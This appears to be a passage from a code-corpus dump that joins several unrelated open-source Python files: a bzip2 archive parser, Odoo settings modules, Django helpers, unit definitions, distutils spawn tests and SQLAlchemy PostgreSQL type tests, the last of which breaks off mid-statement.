         test_swap_loops, test_callfunc1, test_callfunc2,
         test_iftests_in_loops]
#tests = [test_loop_unrolling,
#         test_callfunc1, test_callfunc2, test_iftests_in_loops]
# one compiler/option combination per run of every test:
for compiler in ['g77']:
    for options in ['-O3']:
        for test in tests:
            test(compiler, options)
resultfile.close()
# write a compact table with the main results:
print "\n\n\n"
for (case, cpu) in compactresults:
    print "%-65s %10.3f" % (case, cpu)
| bsd-2-clause |
nadley/Sick-Beard | lib/hachoir_parser/archive/bzip2_parser.py | 90 | 2896 | """
BZIP2 archive file
Author: Victor Stinner
"""
from lib.hachoir_parser import Parser
from lib.hachoir_core.field import (ParserError, String,
Bytes, Character, UInt8, UInt32, CompressedField)
from lib.hachoir_core.endian import LITTLE_ENDIAN
from lib.hachoir_core.text_handler import textHandler, hexadecimal
# Optional decompression support: hachoir's CompressedField expects a
# stream-decompressor factory; Bunzip2 adapts the stdlib BZ2Decompressor
# to that callback interface.
try:
    from bz2 import BZ2Decompressor
    class Bunzip2:
        # One adapter per parsed stream; 'stream' is unused because data is
        # pushed in incrementally through __call__.
        def __init__(self, stream):
            self.bzip2 = BZ2Decompressor()
        def __call__(self, size, data=''):
            # 'size' is part of the CompressedField callback signature but is
            # not needed by the incremental decompressor.
            try:
                return self.bzip2.decompress(data)
            except EOFError:
                # Data arriving after end-of-stream: treat as exhausted.
                return ''
    has_deflate = True
except ImportError:
    # bz2 unavailable: the parser still works, without transparent decompress.
    has_deflate = False
class Bzip2Parser(Parser):
    """Hachoir parser for bzip2 archives: header fields plus compressed payload."""
    PARSER_TAGS = {
        "id": "bzip2",
        "category": "archive",
        "file_ext": ("bz2",),
        "mime": (u"application/x-bzip2",),
        "min_size": 10*8,  # minimum size, in bits
        "magic": (('BZh', 0),),
        "description": "bzip2 archive"
    }
    endian = LITTLE_ENDIAN
    def validate(self):
        # Returns True when valid, or an error string describing the problem.
        if self.stream.readBytes(0, 3) != 'BZh':
            return "Wrong file signature"
        if not("1" <= self["blocksize"].value <= "9"):
            return "Wrong blocksize"
        return True
    def createFields(self):
        # Generator yielding the parsed fields in stream order.
        yield String(self, "id", 3, "Identifier (BZh)", charset="ASCII")
        yield Character(self, "blocksize", "Block size (KB of memory needed to uncompress)")
        yield UInt8(self, "blockheader", "Block header")
        # Two known block-header variants; anything else is a parse error.
        if self["blockheader"].value == 0x17:
            yield String(self, "id2", 4, "Identifier2 (re8P)", charset="ASCII")
            yield UInt8(self, "id3", "Identifier3 (0x90)")
        elif self["blockheader"].value == 0x31:
            yield String(self, "id2", 5, "Identifier 2 (AY&SY)", charset="ASCII")
            if self["id2"].value != "AY&SY":
                raise ParserError("Invalid identifier 2 (AY&SY)!")
        else:
            raise ParserError("Invalid block header!")
        yield textHandler(UInt32(self, "crc32", "CRC32"), hexadecimal)
        if self._size is None: # TODO: is it possible to handle piped input?
            raise NotImplementedError
        size = (self._size - self.current_size)/8
        if size:
            # Derive the uncompressed filename by stripping a '.bz2' suffix
            # from the stream's filename tag, when present.
            for tag, filename in self.stream.tags:
                if tag == "filename" and filename.endswith(".bz2"):
                    filename = filename[:-4]
                    break
            else:
                filename = None
            data = Bytes(self, "file", size)
            if has_deflate:
                CompressedField(self, Bunzip2)
                def createInputStream(**args):
                    # Propagate the stripped filename to the substream's tags.
                    if filename:
                        args.setdefault("tags",[]).append(("filename", filename))
                    return self._createInputStream(**args)
                data._createInputStream = createInputStream
            yield data
| gpl-3.0 |
SINGROUP/pycp2k | pycp2k/classes/_each6.py | 1 | 1112 | from pycp2k.inputsection import InputSection
class _each6(InputSection):
    """CP2K input section ``EACH``: print-frequency settings per iteration level."""
    def __init__(self):
        InputSection.__init__(self)
        # One attribute per supported iteration level, all unset by default.
        # (Order matches the original generated code.)
        for attribute in ("Just_energy", "Powell_opt", "Qs_scf", "Xas_scf",
                          "Md", "Pint", "Metadynamics", "Geo_opt", "Rot_opt",
                          "Cell_opt", "Band", "Ep_lin_solver",
                          "Spline_find_coeffs", "Replica_eval", "Bsse",
                          "Shell_opt", "Tddft_scf"):
            setattr(self, attribute, None)
        self._name = "EACH"
        # Python attribute name -> CP2K keyword (same entries, same order,
        # as the generated original).
        self._keywords = {
            'Bsse': 'BSSE', 'Cell_opt': 'CELL_OPT',
            'Just_energy': 'JUST_ENERGY', 'Band': 'BAND',
            'Xas_scf': 'XAS_SCF', 'Rot_opt': 'ROT_OPT',
            'Replica_eval': 'REPLICA_EVAL', 'Tddft_scf': 'TDDFT_SCF',
            'Shell_opt': 'SHELL_OPT', 'Md': 'MD', 'Pint': 'PINT',
            'Metadynamics': 'METADYNAMICS', 'Geo_opt': 'GEO_OPT',
            'Spline_find_coeffs': 'SPLINE_FIND_COEFFS',
            'Powell_opt': 'POWELL_OPT', 'Qs_scf': 'QS_SCF',
            'Ep_lin_solver': 'EP_LIN_SOLVER'}
DMLoy/ECommerceBasic | lib/python2.7/site-packages/south/utils/__init__.py | 119 | 1945 | """
Generally helpful utility functions.
"""
def _ask_for_it_by_name(name):
"Returns an object referenced by absolute path."
bits = str(name).split(".")
## what if there is no absolute reference?
if len(bits) > 1:
modulename = ".".join(bits[:-1])
else:
modulename = bits[0]
module = __import__(modulename, {}, {}, bits[-1])
if len(bits) == 1:
return module
else:
return getattr(module, bits[-1])
def ask_for_it_by_name(name):
    "Returns an object referenced by absolute path. (Memoised outer wrapper)"
    cache = ask_for_it_by_name.cache
    try:
        return cache[name]
    except KeyError:
        cache[name] = _ask_for_it_by_name(name)
        return cache[name]
ask_for_it_by_name.cache = {}
def get_attribute(item, attribute):
    """
    Like getattr, but recursive (i.e. you can ask for 'foo.bar.yay'.)
    """
    # Peel off one component and recurse on the remainder, if any.
    head, sep, rest = attribute.partition(".")
    value = getattr(item, head)
    return get_attribute(value, rest) if sep else value
def auto_through(field):
    "Returns if the M2M class passed in has an autogenerated through table or not."
    through = field.rel.through
    if not through:
        # Django 1.0/1.1: no explicit through class at all.
        return True
    # Django 1.2+: the generated through model is flagged auto_created.
    meta = getattr(through, "_meta", None)
    return getattr(meta, "auto_created", False)
def auto_model(model):
    "Returns if the given model was automatically generated."
    meta = model._meta
    return getattr(meta, "auto_created", False)
def memoize(function):
    "Standard memoization decorator."
    # Caches the result of a nullary method on the *instance*, under the
    # attribute name '_<methodname>'.
    name = function.__name__
    _name = '_' + name
    def method(self):
        if not hasattr(self, _name):
            value = function(self)
            setattr(self, _name, value)
        return getattr(self, _name)
    def invalidate():
        # NOTE(review): this checks/deletes the attribute on the wrapper
        # function object, but the cached value is stored on the instance
        # (setattr(self, ...) above), so invalidate() appears to be a no-op.
        # Confirm intent before relying on it.
        if hasattr(method, _name):
            delattr(method, _name)
    method.__name__ = function.__name__
    method.__doc__ = function.__doc__
    method._invalidate = invalidate
    return method
| mit |
kirca/OpenUpgrade | addons/base_setup/res_config.py | 261 | 5089 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Business Applications
# Copyright (C) 2004-2012 OpenERP S.A. (<http://openerp.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from openerp.osv import fields, osv
import re
from openerp.report.render.rml2pdf import customfonts
class base_config_settings(osv.osv_memory):
    """Wizard backing the General Settings screen.

    Each ``module_*`` boolean toggles (un)installation of the named module
    when the settings are applied; ``font`` selects the default RML report
    font for the user's company.
    """
    _name = 'base.config.settings'
    _inherit = 'res.config.settings'
    _columns = {
        'module_multi_company': fields.boolean('Manage multiple companies',
            help='Work in multi-company environments, with appropriate security access between companies.\n'
                '-This installs the module multi_company.'),
        'module_share': fields.boolean('Allow documents sharing',
            help="""Share or embbed any screen of Odoo."""),
        'module_portal': fields.boolean('Activate the customer portal',
            help="""Give your customers access to their documents."""),
        'module_auth_oauth': fields.boolean('Use external authentication providers, sign in with google, facebook, ...'),
        'module_base_import': fields.boolean("Allow users to import data from CSV files"),
        'module_google_drive': fields.boolean('Attach Google documents to any record',
            help="""This installs the module google_docs."""),
        'module_google_calendar': fields.boolean('Allow the users to synchronize their calendar with Google Calendar',
            help="""This installs the module google_calendar."""),
        'font': fields.many2one('res.font', string="Report Font", domain=[('mode', 'in', ('Normal', 'Regular', 'all', 'Book'))],
            help="Set the font into the report header, it will be used as default font in the RML reports of the user company"),
    }
    # Default font: the current user's company font.
    _defaults= {
        'font': lambda self,cr,uid,c: self.pool.get('res.users').browse(cr, uid, uid, c).company_id.font.id,
    }
    def open_company(self, cr, uid, ids, context=None):
        # Open the current user's company in a form view.
        user = self.pool.get('res.users').browse(cr, uid, uid, context)
        return {
            'type': 'ir.actions.act_window',
            'name': 'Your Company',
            'view_type': 'form',
            'view_mode': 'form',
            'res_model': 'res.company',
            'res_id': user.company_id.id,
            'target': 'current',
        }
    def _change_header(self, header,font):
        """ Replace default fontname use in header and setfont tag """
        # Rewrite every fontName="..." attribute, then every <setFont name="...">.
        default_para = re.sub('fontName.?=.?".*"', 'fontName="%s"'% font,header)
        return re.sub('(<setFont.?name.?=.?)(".*?")(.)', '\g<1>"%s"\g<3>'% font,default_para)
    def set_base_defaults(self, cr, uid, ids, context=None):
        # Apply the chosen font to the company and rewrite its three RML headers.
        ir_model_data = self.pool.get('ir.model.data')
        wizard = self.browse(cr, uid, ids, context)[0]
        if wizard.font:
            user = self.pool.get('res.users').browse(cr, uid, uid, context)
            font_name = wizard.font.name
            user.company_id.write({'font': wizard.font.id,'rml_header': self._change_header(user.company_id.rml_header,font_name), 'rml_header2': self._change_header(user.company_id.rml_header2, font_name), 'rml_header3': self._change_header(user.company_id.rml_header3, font_name)})
        return {}
    def act_discover_fonts(self, cr, uid, ids, context=None):
        # Rescan the system for available report fonts.
        return self.pool.get("res.font").font_scan(cr, uid, context=context)
# Preferences wizard for Sales & CRM.
# It is defined here because it is inherited independently in modules sale, crm.
class sale_config_settings(osv.osv_memory):
    """Preferences wizard for Sales & CRM; inherited independently by the
    sale and crm modules. Each boolean toggles installation of a module."""
    _name = 'sale.config.settings'
    _inherit = 'res.config.settings'
    _columns = {
        'module_web_linkedin': fields.boolean('Get contacts automatically from linkedIn',
            help="""When you create a new contact (person or company), you will be able to load all the data from LinkedIn (photos, address, etc)."""),
        'module_crm': fields.boolean('CRM'),
        'module_sale' : fields.boolean('SALE'),
        'module_mass_mailing': fields.boolean(
            'Manage mass mailing campaigns',
            help='Get access to statistics with your mass mailing, manage campaigns.'),
    }
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4: | agpl-3.0 |
foxichu/etherkeeper | etherkeeper/util/helpers.py | 2 | 1433 | import json
import datetime
import time
from django.conf import settings
from django.http import HttpResponse
from django.template import loader
def epoch_time(add=0):
    'Returns time since epoch'
    # Whole-second local-time epoch stamp (timetuple() drops microseconds),
    # optionally shifted by 'add' seconds.
    now = datetime.datetime.now()
    return time.mktime(now.timetuple()) + add
def jsonify(*args, **kwargs):
    'Returns a json response'
    payload = None
    if args:
        # A single positional arg is serialized as-is; several become a list.
        payload = args[0] if len(args) == 1 else list(args)
    if kwargs:
        extra = dict(**kwargs)
        if payload:
            # Append the keyword data as an extra dict entry, wrapping the
            # existing payload in a list first when necessary.
            if type(payload) is not list:
                payload = [payload]
            payload.append(extra)
        else:
            payload = extra
    return HttpResponse(json.dumps(payload), content_type='application/json')
def jsonerror(error=None):
    'JSON error response shortcut'
    # Wraps jsonify() so all error responses share one shape:
    # {"success": false, "error": <message or null>}.
    return jsonify(success=False, error=error)
def set_cookie(response, key, value, expire_days = 365,
        domain=settings.SESSION_COOKIE_DOMAIN):
    'Sets a cookie on a response for an amount of days'
    # NOTE(review): the 'domain' default is evaluated once at import time;
    # later changes to settings.SESSION_COOKIE_DOMAIN are not picked up.
    max_age = expire_days * 24 * 60 * 60
    # The Expires header must use the fixed HTTP cookie date format, in GMT.
    expires = datetime.datetime.strftime(datetime.datetime.utcnow() +
        datetime.timedelta(seconds=max_age), "%a, %d-%b-%Y %H:%M:%S GMT")
    response.set_cookie(key, value, max_age=max_age, expires=expires,
        domain=domain, secure=settings.SESSION_COOKIE_SECURE or None)
def srender(template, **kwargs):
    'Render a template to string with given kwargs'
    # Thin convenience wrapper around Django's template loader.
    context = dict(**kwargs)
    return loader.render_to_string(template, context)
| mit |
jpshort/odoo | addons/hr/__openerp__.py | 260 | 2372 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'Employee Directory',
    'version': '1.1',
    # 'author' and 'website' previously appeared twice in this dict literal;
    # Python silently keeps only the last occurrence, so the duplicates were
    # removed keeping the values that actually took effect.
    'author': 'OpenERP SA',
    'website': 'https://www.odoo.com/page/employees',
    'category': 'Human Resources',
    'sequence': 21,
    'summary': 'Jobs, Departments, Employees Details',
    'description': """
Human Resources Management
==========================
This application enables you to manage important aspects of your company's staff and other details such as their skills, contacts, working time...
You can manage:
---------------
* Employees and hierarchies : You can define your employee with User and display hierarchies
* HR Departments
* HR Jobs
    """,
    'depends': ['base_setup','mail', 'resource', 'board'],
    'data': [
        'security/hr_security.xml',
        'security/ir.model.access.csv',
        'hr_view.xml',
        'hr_installer.xml',
        'hr_data.xml',
        'res_config_view.xml',
        'mail_hr_view.xml',
        'res_users_view.xml',
        'views/hr.xml',
    ],
    'demo': ['hr_demo.xml'],
    'test': [
        'test/hr_users.yml',
        'test/open2recruit2close_job.yml',
        'test/hr_demo.yml',
    ],
    'installable': True,
    'application': True,
    'auto_install': False,
    'qweb': [ 'static/src/xml/suggestions.xml' ],
}
| agpl-3.0 |
eufarn7sp/egads-eufar | egads/thirdparty/quantities/units/area.py | 4 | 1079 | """
"""
from __future__ import absolute_import
from ..unitquantity import UnitQuantity
from .length import m, rod
# Area unit definitions, all expressed in square metres (m imported above).
are = ares = UnitQuantity(
    'are',
    100*m**2,
    aliases=['ares']
)
b = barn = UnitQuantity(
    'barn',
    1e-28*m**2,
    symbol='b',
    aliases=['barnes']
)
cmil = circular_mil = UnitQuantity(
    'circular_mil',
    5.067075e-10*m**2,
    symbol='cmil',
    aliases=['circular_mils'],
    doc='conversions approximate, area of a circle with diameter=1 mil'
)
# Darcy: a permeability unit, dimensionally an area.
D = darcy = UnitQuantity(
    'darcy',
    9.869233e-13*m**2,
    symbol='D'
)
mD = millidarcy = UnitQuantity(
    'millidarcy',
    D/1000,
    symbol='mD'
)
ha = hectare = UnitQuantity(
    'hectare',
    10000*m**2,
    symbol='ha',
    aliases=['hectares']
)
acre = international_acre = UnitQuantity(
    'acre',
    4046.8564224*m**2,
    aliases=['acres', 'international_acre', 'international_acres'],
    doc="exact. http://en.wikipedia.org/wiki/Acre"
)
# The US survey acre is defined via the (survey) rod, not the metre.
US_survey_acre = UnitQuantity(
    'US_survey_acre',
    160*rod**2,
    aliases=['US_survey_acres'],
)
# Drop construction-time names so they are not exported as units.
del UnitQuantity, m, rod
| bsd-3-clause |
amyvmiwei/kbengine | kbe/src/lib/python/Lib/distutils/tests/test_spawn.py | 146 | 1857 | """Tests for distutils.spawn."""
import unittest
import os
import time
from test.support import captured_stdout, run_unittest
from distutils.spawn import _nt_quote_args
from distutils.spawn import spawn, find_executable
from distutils.errors import DistutilsExecError
from distutils.tests import support
class SpawnTestCase(support.TempdirManager,
                    support.LoggingSilencer,
                    unittest.TestCase):
    """Tests for distutils.spawn: _nt_quote_args() and spawn()."""
    def test_nt_quote_args(self):
        # Arguments containing spaces must be double-quoted; others untouched.
        for (args, wanted) in ((['with space', 'nospace'],
                                ['"with space"', 'nospace']),
                               (['nochange', 'nospace'],
                                ['nochange', 'nospace'])):
            res = _nt_quote_args(args)
            self.assertEqual(res, wanted)
    @unittest.skipUnless(os.name in ('nt', 'posix'),
                         'Runs only under posix or nt')
    def test_spawn(self):
        tmpdir = self.mkdtemp()
        # creating something executable
        # through the shell that returns 1
        if os.name == 'posix':
            exe = os.path.join(tmpdir, 'foo.sh')
            self.write_file(exe, '#!/bin/sh\nexit 1')
        else:
            exe = os.path.join(tmpdir, 'foo.bat')
            self.write_file(exe, 'exit 1')
        os.chmod(exe, 0o777)
        # a failing child process must surface as DistutilsExecError
        self.assertRaises(DistutilsExecError, spawn, [exe])
        # now something that works
        if os.name == 'posix':
            exe = os.path.join(tmpdir, 'foo.sh')
            self.write_file(exe, '#!/bin/sh\nexit 0')
        else:
            exe = os.path.join(tmpdir, 'foo.bat')
            self.write_file(exe, 'exit 0')
        os.chmod(exe, 0o777)
        spawn([exe])  # should work without any error
def test_suite():
    """Return the suite of all SpawnTestCase tests.

    unittest.makeSuite() was deprecated in Python 3.11 and removed in 3.13;
    TestLoader.loadTestsFromTestCase is the supported equivalent.
    """
    return unittest.TestLoader().loadTestsFromTestCase(SpawnTestCase)

if __name__ == "__main__":
    run_unittest(test_suite())
| lgpl-3.0 |
WinterNis/sqlalchemy | test/dialect/postgresql/test_types.py | 10 | 79161 | # coding: utf-8
from sqlalchemy.testing.assertions import eq_, assert_raises, \
assert_raises_message, is_, AssertsExecutionResults, \
AssertsCompiledSQL, ComparesTables
from sqlalchemy.testing import engines, fixtures
from sqlalchemy import testing
import datetime
from sqlalchemy import Table, MetaData, Column, Integer, Enum, Float, select, \
func, DateTime, Numeric, exc, String, cast, REAL, TypeDecorator, Unicode, \
Text, null, text
from sqlalchemy.sql import operators
from sqlalchemy import types
import sqlalchemy as sa
from sqlalchemy.dialects.postgresql import base as postgresql
from sqlalchemy.dialects.postgresql import HSTORE, hstore, array, \
INT4RANGE, INT8RANGE, NUMRANGE, DATERANGE, TSRANGE, TSTZRANGE, \
JSON, JSONB
import decimal
from sqlalchemy import util
from sqlalchemy.testing.util import round_decimal
from sqlalchemy import inspect
from sqlalchemy import event
tztable = notztable = metadata = table = None
class FloatCoercionTest(fixtures.TablesTest, AssertsExecutionResults):
    """Check how PG drivers coerce numeric results (Decimal vs. float)."""
    __only_on__ = 'postgresql'
    __dialect__ = postgresql.dialect()
    __backend__ = True
    @classmethod
    def define_tables(cls, metadata):
        data_table = Table('data_table', metadata,
            Column('id', Integer, primary_key=True),
            Column('data', Integer)
        )
    @classmethod
    def insert_data(cls):
        data_table = cls.tables.data_table
        data_table.insert().execute(
            {'data': 3},
            {'data': 5},
            {'data': 7},
            {'data': 2},
            {'data': 15},
            {'data': 12},
            {'data': 6},
            {'data': 478},
            {'data': 52},
            {'data': 9},
        )
    @testing.fails_on(
        'postgresql+zxjdbc',
        'XXX: postgresql+zxjdbc currently returns a Decimal result for Float')
    def test_float_coercion(self):
        # stddev_pop over the fixture data; expected value rounded to 9 places.
        # Each type is exercised both via type_= on the function and via CAST.
        data_table = self.tables.data_table
        for type_, result in [
            (Numeric, decimal.Decimal('140.381230939')),
            (Float, 140.381230939),
            (Float(asdecimal=True), decimal.Decimal('140.381230939')),
            (Numeric(asdecimal=False), 140.381230939),
        ]:
            ret = testing.db.execute(
                select([
                    func.stddev_pop(data_table.c.data, type_=type_)
                ])
            ).scalar()
            eq_(round_decimal(ret, 9), result)
            ret = testing.db.execute(
                select([
                    cast(func.stddev_pop(data_table.c.data), type_)
                ])
            ).scalar()
            eq_(round_decimal(ret, 9), result)
    @testing.fails_on('postgresql+zxjdbc',
                      'zxjdbc has no support for PG arrays')
    @testing.provide_metadata
    def test_arrays(self):
        # Round-trip one row through ARRAY columns of each float-ish type.
        metadata = self.metadata
        t1 = Table('t', metadata,
            Column('x', postgresql.ARRAY(Float)),
            Column('y', postgresql.ARRAY(REAL)),
            Column('z', postgresql.ARRAY(postgresql.DOUBLE_PRECISION)),
            Column('q', postgresql.ARRAY(Numeric))
        )
        metadata.create_all()
        t1.insert().execute(x=[5], y=[5], z=[6], q=[decimal.Decimal("6.4")])
        row = t1.select().execute().first()
        eq_(
            row,
            ([5], [5], [6], [decimal.Decimal("6.4")])
        )
class EnumTest(fixtures.TestBase, AssertsExecutionResults):
__backend__ = True
__only_on__ = 'postgresql > 8.3'
@testing.fails_on('postgresql+zxjdbc',
'zxjdbc fails on ENUM: column "XXX" is of type '
'XXX but expression is of type character varying')
def test_create_table(self):
metadata = MetaData(testing.db)
t1 = Table(
'table', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'value', Enum(
'one', 'two', 'three', name='onetwothreetype')))
t1.create()
t1.create(checkfirst=True) # check the create
try:
t1.insert().execute(value='two')
t1.insert().execute(value='three')
t1.insert().execute(value='three')
eq_(t1.select().order_by(t1.c.id).execute().fetchall(),
[(1, 'two'), (2, 'three'), (3, 'three')])
finally:
metadata.drop_all()
metadata.drop_all()
def test_name_required(self):
metadata = MetaData(testing.db)
etype = Enum('four', 'five', 'six', metadata=metadata)
assert_raises(exc.CompileError, etype.create)
assert_raises(exc.CompileError, etype.compile,
dialect=postgresql.dialect())
@testing.fails_on('postgresql+zxjdbc',
'zxjdbc fails on ENUM: column "XXX" is of type '
'XXX but expression is of type character varying')
@testing.provide_metadata
def test_unicode_labels(self):
metadata = self.metadata
t1 = Table(
'table',
metadata,
Column(
'id',
Integer,
primary_key=True),
Column(
'value',
Enum(
util.u('réveillé'),
util.u('drôle'),
util.u('S’il'),
name='onetwothreetype')))
metadata.create_all()
t1.insert().execute(value=util.u('drôle'))
t1.insert().execute(value=util.u('réveillé'))
t1.insert().execute(value=util.u('S’il'))
eq_(t1.select().order_by(t1.c.id).execute().fetchall(),
[(1, util.u('drôle')), (2, util.u('réveillé')),
(3, util.u('S’il'))]
)
m2 = MetaData(testing.db)
t2 = Table('table', m2, autoload=True)
eq_(
t2.c.value.type.enums,
(util.u('réveillé'), util.u('drôle'), util.u('S’il'))
)
@testing.provide_metadata
def test_non_native_enum(self):
metadata = self.metadata
t1 = Table(
'foo',
metadata,
Column(
'bar',
Enum(
'one',
'two',
'three',
name='myenum',
native_enum=False)))
def go():
t1.create(testing.db)
self.assert_sql(
testing.db, go, [
("CREATE TABLE foo (\tbar "
"VARCHAR(5), \tCONSTRAINT myenum CHECK "
"(bar IN ('one', 'two', 'three')))", {})])
with testing.db.begin() as conn:
conn.execute(
t1.insert(), {'bar': 'two'}
)
eq_(
conn.scalar(select([t1.c.bar])), 'two'
)
@testing.provide_metadata
def test_non_native_enum_w_unicode(self):
metadata = self.metadata
t1 = Table(
'foo',
metadata,
Column(
'bar',
Enum('B', util.u('Ü'), name='myenum', native_enum=False)))
def go():
t1.create(testing.db)
self.assert_sql(
testing.db,
go,
[
(
util.u(
"CREATE TABLE foo (\tbar "
"VARCHAR(1), \tCONSTRAINT myenum CHECK "
"(bar IN ('B', 'Ü')))"
),
{}
)
])
with testing.db.begin() as conn:
conn.execute(
t1.insert(), {'bar': util.u('Ü')}
)
eq_(
conn.scalar(select([t1.c.bar])), util.u('Ü')
)
@testing.provide_metadata
def test_disable_create(self):
metadata = self.metadata
e1 = postgresql.ENUM('one', 'two', 'three',
name="myenum",
create_type=False)
t1 = Table('e1', metadata,
Column('c1', e1)
)
# table can be created separately
# without conflict
e1.create(bind=testing.db)
t1.create(testing.db)
t1.drop(testing.db)
e1.drop(bind=testing.db)
@testing.provide_metadata
def test_generate_multiple(self):
"""Test that the same enum twice only generates once
for the create_all() call, without using checkfirst.
A 'memo' collection held by the DDL runner
now handles this.
"""
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum")
t1 = Table('e1', metadata,
Column('c1', e1)
)
t2 = Table('e2', metadata,
Column('c1', e1)
)
metadata.create_all(checkfirst=False)
metadata.drop_all(checkfirst=False)
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
@testing.provide_metadata
def test_generate_alone_on_metadata(self):
"""Test that the same enum twice only generates once
for the create_all() call, without using checkfirst.
A 'memo' collection held by the DDL runner
now handles this.
"""
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum", metadata=self.metadata)
metadata.create_all(checkfirst=False)
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
metadata.drop_all(checkfirst=False)
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
@testing.provide_metadata
def test_generate_multiple_on_metadata(self):
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum", metadata=metadata)
t1 = Table('e1', metadata,
Column('c1', e1)
)
t2 = Table('e2', metadata,
Column('c1', e1)
)
metadata.create_all(checkfirst=False)
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
metadata.drop_all(checkfirst=False)
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
e1.create() # creates ENUM
t1.create() # does not create ENUM
t2.create() # does not create ENUM
@testing.provide_metadata
def test_drops_on_table(self):
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum")
table = Table(
'e1', metadata,
Column('c1', e1)
)
table.create()
table.drop()
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
table.create()
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
table.drop()
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
@testing.provide_metadata
def test_remain_on_table_metadata_wide(self):
metadata = self.metadata
e1 = Enum('one', 'two', 'three',
name="myenum", metadata=metadata)
table = Table(
'e1', metadata,
Column('c1', e1)
)
# need checkfirst here, otherwise enum will not be created
assert_raises_message(
sa.exc.ProgrammingError,
'.*type "myenum" does not exist',
table.create,
)
table.create(checkfirst=True)
table.drop()
table.create(checkfirst=True)
table.drop()
assert 'myenum' in [
e['name'] for e in inspect(testing.db).get_enums()]
metadata.drop_all()
assert 'myenum' not in [
e['name'] for e in inspect(testing.db).get_enums()]
def test_non_native_dialect(self):
engine = engines.testing_engine()
engine.connect()
engine.dialect.supports_native_enum = False
metadata = MetaData()
t1 = Table(
'foo',
metadata,
Column(
'bar',
Enum(
'one',
'two',
'three',
name='myenum')))
def go():
t1.create(engine)
try:
self.assert_sql(
engine, go, [
("CREATE TABLE foo (bar "
"VARCHAR(5), CONSTRAINT myenum CHECK "
"(bar IN ('one', 'two', 'three')))", {})])
finally:
metadata.drop_all(engine)
def test_standalone_enum(self):
metadata = MetaData(testing.db)
etype = Enum('four', 'five', 'six', name='fourfivesixtype',
metadata=metadata)
etype.create()
try:
assert testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
finally:
etype.drop()
assert not testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
metadata.create_all()
try:
assert testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
finally:
metadata.drop_all()
assert not testing.db.dialect.has_type(testing.db,
'fourfivesixtype')
def test_no_support(self):
def server_version_info(self):
return (8, 2)
e = engines.testing_engine()
dialect = e.dialect
dialect._get_server_version_info = server_version_info
assert dialect.supports_native_enum
e.connect()
assert not dialect.supports_native_enum
# initialize is called again on new pool
e.dispose()
e.connect()
assert not dialect.supports_native_enum
def test_reflection(self):
metadata = MetaData(testing.db)
etype = Enum('four', 'five', 'six', name='fourfivesixtype',
metadata=metadata)
t1 = Table(
'table', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'value', Enum(
'one', 'two', 'three', name='onetwothreetype')),
Column('value2', etype))
metadata.create_all()
try:
m2 = MetaData(testing.db)
t2 = Table('table', m2, autoload=True)
assert t2.c.value.type.enums == ('one', 'two', 'three')
assert t2.c.value.type.name == 'onetwothreetype'
assert t2.c.value2.type.enums == ('four', 'five', 'six')
assert t2.c.value2.type.name == 'fourfivesixtype'
finally:
metadata.drop_all()
def test_schema_reflection(self):
metadata = MetaData(testing.db)
etype = Enum(
'four',
'five',
'six',
name='fourfivesixtype',
schema='test_schema',
metadata=metadata,
)
t1 = Table(
'table', metadata,
Column(
'id', Integer, primary_key=True),
Column(
'value', Enum(
'one', 'two', 'three',
name='onetwothreetype', schema='test_schema')),
Column('value2', etype))
metadata.create_all()
try:
m2 = MetaData(testing.db)
t2 = Table('table', m2, autoload=True)
assert t2.c.value.type.enums == ('one', 'two', 'three')
assert t2.c.value.type.name == 'onetwothreetype'
assert t2.c.value2.type.enums == ('four', 'five', 'six')
assert t2.c.value2.type.name == 'fourfivesixtype'
assert t2.c.value2.type.schema == 'test_schema'
finally:
metadata.drop_all()
class OIDTest(fixtures.TestBase):
    """Verify that PostgreSQL OID columns reflect back as the OID type."""
    __only_on__ = 'postgresql'
    __backend__ = True
    @testing.provide_metadata
    def test_reflection(self):
        metadata = self.metadata
        Table('table', metadata, Column('x', Integer),
              Column('y', postgresql.OID))
        metadata.create_all()
        m2 = MetaData()
        # Reflect into a fresh MetaData and check the reflected column type.
        t2 = Table('table', m2, autoload_with=testing.db, autoload=True)
        assert isinstance(t2.c.y.type, postgresql.OID)
class NumericInterpretationTest(fixtures.TestBase):
    """Check result-processor behavior for Numeric across PG drivers."""
    __only_on__ = 'postgresql'
    __backend__ = True
    def test_numeric_codes(self):
        from sqlalchemy.dialects.postgresql import psycopg2cffi, pg8000, \
            psycopg2, base
        dialects = (pg8000.dialect(), psycopg2.dialect(),
